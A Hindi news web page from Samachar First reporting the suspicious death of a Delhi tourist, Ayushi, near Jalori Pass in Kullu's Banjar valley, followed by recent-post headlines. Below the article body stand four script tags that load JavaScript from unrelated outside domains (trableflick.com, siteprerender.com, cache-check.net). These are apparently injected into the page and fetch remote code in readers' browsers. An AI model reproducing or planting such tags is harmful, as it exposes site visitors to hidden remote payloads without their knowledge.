कुल्लूः दिल्ली से बंजार घाटी घूमने आई पर्यटक युवती की संदिग्ध परिस्थितियों में मौत

<p>जिला कुल्लू में एक पर्यटक युवती आयुषी की संदिग्ध परिस्थितियों में मौत होने का मामला सामने आया है। यहां बंजार घाटी में पश्चिम विहार नई दिल्ली से कुछ पर्यटक बर्फबारी एवं ट्रेकिंग का आनंद उठाने 11 दिसम्बर को पर्यटन स्थल तीर्थन वेली पहुंचे। गत दिवस दोपहर के समय वह गाड़ी के माध्यम से सोझा के पास पहुंचे तो वहां बर्फ होने के कारण वह वहां से जलोड़ी पास की तरफ पैदल ही निकल पड़े। युवती भी उनके साथ चल रही थी।&nbsp;&nbsp;&nbsp; &nbsp;</p>

<p>जलोड़ी पास के रास्ते में अन्य पर्यटक भी बर्फबारी का लुत्फ उठा रहे थे। इस दौरान आयुषी&nbsp; अचानक सड़क पर गिर गई। वहीं मौजूद अन्य पर्यटकों ने युवती के साथियों को आवाज़ लगाकर बताया कि उनकी दोस्त सड़क पर गिर गई है। उसके साथियों ने निजी वाहन की मदद से आयुषी को नागरिक अस्पताल बंजार पहुंचाया जहां डॉक्टर ने उसे मृत घोषित कर दिया।</p>

<p>पुलिस अधीक्षक गौरव सिंह ने मामले की पुष्टि करते हुए बताया कि सूचना मिलने पर पुलिस मौके पर पहुंची और सभी तथ्यों की बारीकी से&nbsp; जांच कर रही है। युवती के साथी अक्षय पुत्र प्रदीप निवासी पश्चिम विहार, न्यू दिल्ली और अन्य के ब्यान दर्ज कर लिएगए हैं। पुलिस ने शव को पोस्टमार्टम के लिए भेज दिया। मौत के सही कारणों का पता पोस्टमार्टम रिपोर्ट आने के बाद ही चल पाएगा। बता दें कि जिला प्रशासन द्वारा बर्फीले क्षेत्रों में न जाने की एडवाइजरी भी जारी की गई थी।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1607943360033″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

पुराने साथियों की घर वापसी से कांग्रेस संगठन हो रहा मजबूत

शिमला जिला के कुमारसैन वार्ड के जिला परिषद सदस्य उज्वल मेहता आज प्रदेश कांग्रेस मुख्यालय…

13 hours ago

“भाजपा कांग्रेस के घोषणा पत्र को लेकर भ्रामक प्रचार कर रही”

लोकसभा चुनाव में कांग्रेस घोषणा पत्र को लेकर जहां भाजपा बार-बार हिंदुत्व विरोधी और बहुसंख्यक…

13 hours ago

राष्ट्रपति द्रौपदी मुर्मू का आज शिमला पहुंचने पर स्वागत

राष्ट्रपति द्रौपदी मुर्मु का आज शिमला पहुंचने पर मशोबरा स्थित कल्याणी हेलीपैड पर राज्यपाल शिव…

13 hours ago

बागवान भोपाल ने तकनीक के इस्तेमाल से किसानी को बनाया मुनाफे का सौदा

वर्तमान में किसनी और बागवानी में भी आधुनिकीकरण का प्रभाव देखने को मिल रहा है.…

13 hours ago

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी -गद्दी नेता कपूर बीते…

15 hours ago

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध: बिंदल

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध, कांग्रेस नेता कर रहे…

16 hours ago